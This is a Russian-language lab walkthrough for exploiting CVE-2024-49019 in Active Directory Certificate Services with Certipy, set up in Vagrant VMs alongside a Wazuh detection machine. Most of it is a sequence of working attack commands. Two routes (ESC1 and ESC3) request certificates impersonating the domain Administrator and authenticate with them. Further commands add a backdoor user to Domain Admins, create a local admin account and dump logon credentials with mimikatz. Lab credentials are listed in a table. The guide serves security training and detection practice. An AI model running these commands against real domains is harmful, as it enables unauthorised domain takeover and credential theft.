
Эксплуатация для CVE-2024-49019
CVE-2024-49019 — это уязвимость в службах сертификации Active Directory (AD CS), которая позволяет злоумышленнику повышать привилегии, неправомерно используя аутентификацию на основе сертификатов. В этом руководстве показано, как эксплуатировать данную уязвимость с помощью Certipy.
| Виртуальная машина | Имя пользователя | Пароль |
|---|---|---|
| Windows Server 2022 | Administrator | !@windowsadmintest101 |
| Windows Server 2022 | testuser | $Vulnerable139 |
| Kali-VM | vagrant | vagrant |
| Ubuntu-Wazuh | wazuh | admin |
Виртуальная машина Ubuntu-Wazuh используется для целей обнаружения. Руководство по обнаружению Смягчение последствий
Сначала клонируйте репозиторий, содержащий необходимые файлы:
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng
Перед продолжением необходимо установить Vagrant на вашу хост-машину.
Скачайте и установите Vagrant здесь или установите с помощью PowerShell:
choco install vagrant
sudo apt update && sudo apt install vagrant -y
cd windows-server2022
vagrant up
cd kali-VM
vagrant up
cd WazuhUbuntu
vagrant up
Поскольку для эксплуатации требуется NAT-сеть, настройте VirtualBox следующим образом:
Перед выполнением команды ниже убедитесь, что VBoxManage добавлен в переменные окружения. Если нет, выполните команду, используя её полный путь:
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Если VBoxManage не распознан, используйте:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Убедитесь, что все виртуальные машины в VirtualBox назначены на сетевой адаптер NatNetwork - NatNet1. Вы можете создать NAT-сеть с другим именем, но она должна находиться в диапазоне IP-адресов 10.0.2.0/24.
Перед продолжением убедитесь, что все виртуальные машины включены.
Войдите в виртуальную машину Kali Linux, чтобы начать атаку, и обновите файл /etc/hosts:
sudo nano /etc/hosts
Добавьте следующую запись:
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
Сохраните и выйдите.
Перейдите в каталог CVE-49019 и активируйте виртуальное окружение Python:
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate
Существует два способа эксплуатации этой уязвимости: ESC1 и ESC3.
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
add_user badadmin
add_user_to_group badadmin "Domain Admins"
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121
certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121
Существует обходное решение: убедитесь, что время на вашей хост-машине совпадает со временем самого Windows Server. Выполните эту команду, чтобы синхронизировать виртуальную машину Kali-Linux с Windows Server.
sudo timedatectl set-ntp off
sudo rdate -n 10.0.2.121
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
После получения доступа уровня администратора злоумышленник может:
net user hacked /add
net localgroup "Administrators" hacked /add
sekurlsa::logonpasswords
Стратегии обнаружения и смягчения последствий см. в руководстве по обнаружению.
CVE-2024-49019 представляет значительный риск для безопасности из-за возможности несанкционированного повышения привилегий. Понимание этой уязвимости и развёртывание надлежащих механизмов обнаружения, таких как использование Wazuh, имеет решающее значение для защиты сред Active Directory.
Дополнительную информацию о защите AD CS см. в Microsoft Security CVE-2024-49019.